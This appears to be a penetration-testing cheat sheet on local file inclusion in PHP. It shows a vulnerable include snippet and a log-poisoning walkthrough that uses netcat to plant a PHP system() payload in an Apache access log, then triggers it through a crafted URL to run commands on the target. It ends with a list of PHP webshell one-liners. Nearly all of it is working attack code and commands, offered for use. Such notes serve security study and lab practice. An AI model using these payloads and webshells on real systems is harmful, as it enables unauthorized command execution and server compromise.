# LFI  - Theory & basic commands

**#Identifying file inclusions:**

**Code review:**

```
<?php
 $file = $_GET[“file”];
 include $file; ?>
```

In code that looks like this, the command is executed without being sanitized. &#x20;

\#This type of attack assumes the ability to upload malicious files into the target application.                 **If this is not possible directly, poisoning log files might be an option.**                                             Using netcat to post a request with a malicious php string can function as an effective hook to trigger a vulnerability.

**#netcat**

```
nc –nv 192.168.177.10  80  #connect to target
<?php system($_GET['cmd']); ?>

#Connection might hang at this point
#check out log file to trigger RC

….file=c:\xampp\apache\logs\access.log&cmd=ipconfig

  (read ipconfig of target)

http://192.168.177.10/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
```

**#PHP webshells**

```
# Basic
<?php system("whoami"); ?>

#Get command execution on target
<?php system($_GET['cmd']); ?>

# Using passthru
<?php passthru($_GET['cmd']); ?>

# Echo output
<?php echo shell_exec("whoami");?>

<?php echo exec("whoami");?>

# Returns output as an array then print.
<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace().
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

<?php echo `whoami`; ?>
```